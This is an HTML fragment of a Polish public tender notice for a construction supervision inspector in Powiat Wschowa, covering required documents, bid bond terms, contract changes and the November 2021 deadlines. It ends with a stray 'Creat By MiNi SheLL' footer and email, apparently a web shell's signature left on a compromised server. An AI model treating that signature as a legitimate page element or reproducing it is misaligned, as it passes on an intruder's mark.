i urządzeń wod.-kan.<br/>- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>- instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) DOKUMENTY SKŁADANE RAZEM Z OFERTĄ 1. Oferta składana jest<br/>pod rygorem nieważności w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem kwalifikowalnym, podpisem<br/>zaufanym lub podpisem osobistym – załącznik nr 2 do SWZ.2. Wykonawca dołącza do oferty<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu<br/>(załącznik nr 3 od SWZ) w zakresie wskazanym w rozdziale II podrozdziale 9 SWZ. <br/>4.Oświadczenie składają odrębnie: - wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu; - podmiot trzeci, na którego potencjał powołuje się<br/>wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy; - podwykonawcy, na<br/>których zasobach wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w<br/>postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>podwykonawcy. 5. Samooczyszczenie 6. Do oferty wykonawca załącza również: (wybrać odpowiednie)<br/>a) Pełnomocnictwo b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>c) Zobowiązanie podmiotu trzeciego d) Dowód uiszczenia wadium.e) Zastrzeżenie tajemnicy<br/>przedsiębiorstwa 2) DOKUMENTY SKŁADANE NA WEZWANIE 1.Wykaz podmiotowych środków<br/>dowodowych Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej<br/>oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:1) Oświadczenie Wykonawcy, w zakresie art. 108 ust.1. pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz.U. z 2019 r. poz.369), z innymi Wykonawcą, który złożył<br/>odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 a/7b do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) DOKUMENTY SKŁADANE RAZEM Z OFERTĄ 1. Oferta składana jest<br/>pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>kwalifikowalnym, podpisem zaufanym lub podpisem osobistym – załącznik nr 2a/2b do SWZ.2.<br/>Wykonawca<br/>dołącza do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu<br/>wykluczeniu (załącznik nr 3a/3b od SWZ) w zakresie wskazanym w rozdziale II podrozdziale 7 SWZ. 4.<br/>Oświadczenie składają odrębnie: - wykonawca/każdy spośród wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu; - podmiot trzeci, na którego<br/>potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w<br/>postępowaniu.warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje<br/>zasoby wykonawcy;<br/>- podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu spełnienia warunków<br/>udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>podwykonawcy. 5. Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 i 6<br/>ustawy Pzp, wykonawca nie podlega wykluczeniu jeżeli udowodni zamawiającemu, że spełnił łącznie<br/>następujące przesłanki: 1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej<br/>przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez<br/>zadośćuczynienie pieniężne; 2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem,<br/>wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami,<br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania lub<br/>zamawiającym; 3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla<br/>zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w<br/>szczególności: a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za<br/>nieprawidłowe postępowanie wykonawcy, b) zreorganizował personel, c) wdrożył system<br/>sprawozdawczości i kontroli, d) utworzył struktury audytu wewnętrznego do monitorowania<br/>przestrzegania przepisów, wewnętrznych regulacji lub standardów, e) wprowadził wewnętrzne<br/>regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych<br/>regulacji lub standardów. Zamawiający ocenia, czy podjęte przez wykonawcę czynności<br/>sąwystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu<br/>wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza wykonawcę.6. Do oferty wykonawca<br/>załącza również: (wybrać odpowiednie) a) Pełnomocnictwo b) Oświadczenie wykonawców wspólnieubiegających się o udzielenie zamówienia c) Zobowiązanie podmiotu trzeciego d) Dowód uiszczenia<br/>wadium.e) Zastrzeżenie tajemnicy przedsiębiorstwa 2) DOKUMENTY SKŁADANE NA WEZWANIE<br/>1.Wykaz podmiotowych środków dowodowych Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający<br/>przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia,<br/>następujących podmiotowych środków dowodowych:a)Wykaz usług b) Wykaz osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokość 1 000,00 zł (słownie: tysiąc złotych 00/100). <br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. <br/>3. Wadium może być wniesione w formach określonych w art. 97 ust.7 ustawy pzp. <br/>4. Jeżeli wadium jest wnoszone w innej formie niż w pieniądzu Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego nr: 34 8669 0001 2011 0003 8380 0007 z dopiskiem „Wadium- Inspektor nadzoru” (a potwierdzenie wpłaty należy załączyć do oferty). Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. <br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. <br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą; <br/>2) zawarcia umowy w sprawie zamówienia publicznego; <br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od złożenia wniosku zwraca wadium wykonawcy: <br/>1) Który wycofał ofertę przed upływem terminu składania ofert; <br/>2) którego oferta została odrzucona; <br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>4) po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>10. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>11. Złożenia wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <br/>12. Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie niepieniężnej, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli: <br/>1) Wykonawca w odpowiedzi na wezwanie, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postepowaniu i brak podstaw wykluczenia, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty jako najkorzystniejszej; <br/>2) Wykonawca, którego oferta została wybrana: <br/>a) Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, <br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które usługi wykonają poszczególni wykonawcy.Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te<br/>zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy.<br/>wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 10 projektu umowy stanowiącym załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiatwschowa.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-26 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com